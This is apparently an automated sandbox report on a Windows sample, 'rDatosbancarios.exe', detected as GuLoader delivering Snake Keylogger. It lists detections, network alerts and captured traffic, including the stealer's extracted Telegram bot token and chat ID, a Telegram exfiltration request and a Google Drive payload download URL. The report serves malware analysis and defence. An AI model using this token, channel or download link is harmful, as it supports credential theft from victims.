Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rDatosbancarios.exe

Overview

General Information

Sample name:rDatosbancarios.exe
Analysis ID:1634944
MD5:ad465ed89a2c85de228c1eca00ad3c21
SHA1:693a1f701261b57a351587afaabcfd7e9e519db2
SHA256:05e5731dc9129d9f1019a21fbbb672fa0a01a1bb8e89393e630b75ec38797928
Tags:exeuser-Porcupine
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Joe Sandbox ML detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • rDatosbancarios.exe (PID: 7696 cmdline: "C:\Users\user\Desktop\rDatosbancarios.exe" MD5: AD465ED89A2C85DE228C1ECA00AD3C21)
    • rDatosbancarios.exe (PID: 664 cmdline: "C:\Users\user\Desktop\rDatosbancarios.exe" MD5: AD465ED89A2C85DE228C1ECA00AD3C21)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7869489618:AAHN5xZzcFLHOzYCX49Sa8fwJ0Zb2PusB48", "Chat_id": "7618581100", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.3065111248.0000000033C71000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    0000000A.00000002.3065111248.0000000033D59000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000002.2064115944.0000000004506000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: rDatosbancarios.exe PID: 664JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: rDatosbancarios.exe PID: 664JoeSecurity_TelegramRATYara detected Telegram RATJoe Security

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-11T08:09:33.607468+010028033053Unknown Traffic192.168.2.449730104.21.16.1443TCP
            2025-03-11T08:09:36.594270+010028033053Unknown Traffic192.168.2.449731104.21.16.1443TCP
            2025-03-11T08:09:39.240530+010028033053Unknown Traffic192.168.2.449732104.21.16.1443TCP
            2025-03-11T08:09:42.283716+010028033053Unknown Traffic192.168.2.449733104.21.16.1443TCP
            2025-03-11T08:09:44.577022+010028033053Unknown Traffic192.168.2.449734104.21.16.1443TCP
            2025-03-11T08:09:46.828365+010028033053Unknown Traffic192.168.2.449735104.21.16.1443TCP
            2025-03-11T08:09:49.028540+010028033053Unknown Traffic192.168.2.449736104.21.16.1443TCP
            2025-03-11T08:09:52.061609+010028033053Unknown Traffic192.168.2.449737104.21.16.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-11T08:09:28.502596+010028032742Potentially Bad Traffic192.168.2.449728193.122.130.080TCP
            2025-03-11T08:09:31.346349+010028032742Potentially Bad Traffic192.168.2.449728193.122.130.080TCP
            2025-03-11T08:09:33.752601+010028032742Potentially Bad Traffic192.168.2.449728193.122.130.080TCP
            2025-03-11T08:09:36.752651+010028032742Potentially Bad Traffic192.168.2.449728193.122.130.080TCP
            2025-03-11T08:09:39.424508+010028032742Potentially Bad Traffic192.168.2.449728193.122.130.080TCP
            2025-03-11T08:09:42.440235+010028032742Potentially Bad Traffic192.168.2.449728193.122.130.080TCP
            2025-03-11T08:09:44.752662+010028032742Potentially Bad Traffic192.168.2.449728193.122.130.080TCP
            2025-03-11T08:09:46.987000+010028032742Potentially Bad Traffic192.168.2.449728193.122.130.080TCP
            2025-03-11T08:09:49.190177+010028032742Potentially Bad Traffic192.168.2.449728193.122.130.080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-11T08:09:21.656836+010028032702Potentially Bad Traffic192.168.2.449726142.250.185.142443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-11T08:09:55.021760+010018100071Potentially Bad Traffic192.168.2.449738149.154.167.220443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: rDatosbancarios.exeAvira: detected
            Found malware configuration
            Source: 0000000A.00000002.3065111248.0000000033C71000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7869489618:AAHN5xZzcFLHOzYCX49Sa8fwJ0Zb2PusB48", "Chat_id": "7618581100", "Version": "4.4"}
            Multi AV Scanner detection for submitted file
            Source: rDatosbancarios.exeVirustotal: Detection: 45%Perma Link
            Source: rDatosbancarios.exeReversingLabs: Detection: 42%
            Joe Sandbox ML detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Tries to detect the country of the analysis system (by using the IP)
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36668790 CryptUnprotectData,10_2_36668790
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36668EF1 CryptUnprotectData,10_2_36668EF1
            Source: rDatosbancarios.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49729 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.4:49726 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.4:49727 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49738 version: TLS 1.2
            Source: rDatosbancarios.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 0_2_0040596F CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040596F
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 0_2_004064C1 FindFirstFileW,FindClose,0_2_004064C1
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_0040596F CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,10_2_0040596F
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_004064C1 FindFirstFileW,FindClose,10_2_004064C1
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_004027FB FindFirstFileW,10_2_004027FB
            Source: C:\Users\user\Desktop\rDatosbancarios.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer ShortcutsJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 0355F45Dh10_2_0355F2C0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 0355F45Dh10_2_0355F4AC
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 0355FC19h10_2_0355F961
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 35F80D0Dh10_2_35F80B30
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 35F816F8h10_2_35F80B30
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 35F83308h10_2_35F82EF0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 35F82D41h10_2_35F82A90
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 35F8D069h10_2_35F8CDC0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 35F8FBD9h10_2_35F8F930
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 35F8F781h10_2_35F8F4D8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 35F8F329h10_2_35F8F080
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h10_2_35F80040
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 35F8EED1h10_2_35F8EC28
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 35F8EA79h10_2_35F8E7D0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 35F8E621h10_2_35F8E378
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 35F8E1C9h10_2_35F8DF20
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 35F83308h10_2_35F82EE6
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 35F8DD71h10_2_35F8DAC8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 35F8D919h10_2_35F8D670
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 35F83308h10_2_35F83236
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 35F8D4C1h10_2_35F8D218
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 3666A3AFh10_2_3666A0E0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36667EB5h10_2_36667B78
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 366625A9h10_2_36662300
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36669280h10_2_36668FB0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36663709h10_2_36663460
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36667119h10_2_36666E70
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 3666F13Fh10_2_3666EE70
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36664D21h10_2_36664A78
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 366602E9h10_2_36660040
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 3666BF0Fh10_2_3666BC40
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36661CF9h10_2_36661A50
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36669F1Fh10_2_36669C50
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 366648C9h10_2_36664620
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 366662D9h10_2_36666030
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 3666DEFFh10_2_3666DC30
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 3666ACCFh10_2_3666AA00
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 366632B1h10_2_36663008
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36666CC1h10_2_36666A18
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36660B99h10_2_366608F0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 3666E38Fh10_2_3666E0C0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36667571h10_2_366672C8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36665179h10_2_36664ED0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 3666C39Fh10_2_3666C0D0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36662151h10_2_36661EA8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 3666D14Fh10_2_3666CE80
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36666733h10_2_36666488
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 3666B15Fh10_2_3666AE90
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36660741h10_2_36660498
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 3666C82Fh10_2_3666C560
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 3666A83Fh10_2_3666A570
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36660FF1h10_2_36660D48
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 3666E81Fh10_2_3666E550
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36662A01h10_2_36662758
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 366679C9h10_2_36667720
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 3666B5EFh10_2_3666B320
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 366655D1h10_2_36665328
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 3666F5CFh10_2_3666F300
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 3666D5DFh10_2_3666D310
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 3666ECAFh10_2_3666E9E0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 3666CCBFh10_2_3666C9F0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 366618A1h10_2_366615F8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36669A8Fh10_2_366697C0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36665E81h10_2_36665BD8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36661449h10_2_366611A0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 3666DA6Fh10_2_3666D7A0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36662E59h10_2_36662BB0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 3666BA7Fh10_2_3666B7B0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36665A29h10_2_36665780
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 3666FA5Fh10_2_3666F790
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DB3E27h10_2_36DB3B58
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DB4E18h10_2_36DB4B20
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DB19A7h10_2_36DB16D8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DB95D0h10_2_36DB92D8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DB6AC8h10_2_36DB67D0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DB3997h10_2_36DB36C8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DBD8C0h10_2_36DBD5C8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DBADB8h10_2_36DBAAC0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DB22C7h10_2_36DB1FF8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DBA8F0h10_2_36DBA5F8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DB7DE8h10_2_36DB7AF0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DB42B7h10_2_36DB3FE8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DB52E0h10_2_36DB4FE8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DBEBE1h10_2_36DBE8E8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DBC0D8h10_2_36DBBDE0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DB0767h10_2_36DB0498
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DB6F90h10_2_36DB6C98
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DBDD88h10_2_36DBDA90
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DB2757h10_2_36DB2488
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DBB280h10_2_36DBAF88
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DB8778h10_2_36DB8480
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DB1087h10_2_36DB0DB8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DB82B0h10_2_36DB7FB8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DB57A8h10_2_36DB54B0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DBF0A8h10_2_36DBEDB0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DB3078h10_2_36DB2DA8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DBC5A0h10_2_36DBC2A8
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DB9A98h10_2_36DB97A0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DBE250h10_2_36DBDF58
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DBB748h10_2_36DBB450
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DB1517h10_2_36DB1248
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DB8C40h10_2_36DB8948
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DB02E7h10_2_36DB0040
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DB6138h10_2_36DB5E40
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DBFA38h10_2_36DBF740
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DB47E8h10_2_36DB4478
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DB5C70h10_2_36DB5978
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DBF570h10_2_36DBF278
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DBCA68h10_2_36DBC770
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DB1E37h10_2_36DB1B68
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DB9F60h10_2_36DB9C68
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DB7458h10_2_36DB7160
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DB2BE7h10_2_36DB2918
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DBBC10h10_2_36DBB918
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DB9108h10_2_36DB8E10
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DB6600h10_2_36DB6308
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DBD3F8h10_2_36DBD100
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DB3507h10_2_36DB3238
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DBCF30h10_2_36DBCC38
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DBA428h10_2_36DBA130
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DB0BF7h10_2_36DB0928
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DB7920h10_2_36DB7628
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DBE718h10_2_36DBE420
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]10_2_36DDF21F
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]10_2_36DDF228
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DE0800h10_2_36DE0508
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then jmp 36DE0338h10_2_36DE0040
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]10_2_36E12A80
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]10_2_36E12A70
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]10_2_36E12A21

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49738 -> 149.154.167.220:443
            Uses the Telegram API (likely for C&C communication)
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:358075%0D%0ADate%20and%20Time:%2011/03/2025%20/%2003:09:48%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20358075%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
            Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
            Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49728 -> 193.122.130.0:80
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49731 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49735 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49733 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49732 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49734 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49736 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49726 -> 142.250.185.142:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49730 -> 104.21.16.1:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1VDKRd-c17oS52zp028IfAVUC5WknOEF- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
